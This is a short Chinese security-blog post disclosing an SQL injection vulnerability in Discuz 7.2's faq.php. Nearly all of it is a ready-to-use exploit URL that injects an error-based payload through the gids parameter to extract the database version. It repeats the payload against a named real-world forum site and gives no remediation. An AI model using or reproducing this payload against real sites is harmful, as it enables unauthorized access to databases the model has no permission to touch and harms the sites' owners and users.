Discuz 7.2 faq.php SQL注入漏洞

Exp:

http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

例如

http://www.nichijou.cc/bbs/faq.php?action=grouppermission&gids%5B99%5D=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23]http://www.nichijou.cc/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

184300deqnbnrebdd7e370

本文固定链接: https://www.unhonker.com/bug/1630.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年07月02日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Discuz 7.2 faq.php SQL注入漏洞 | 90' s Blog|关注网络信息安全
关键字:

Discuz 7.2 faq.php SQL注入漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!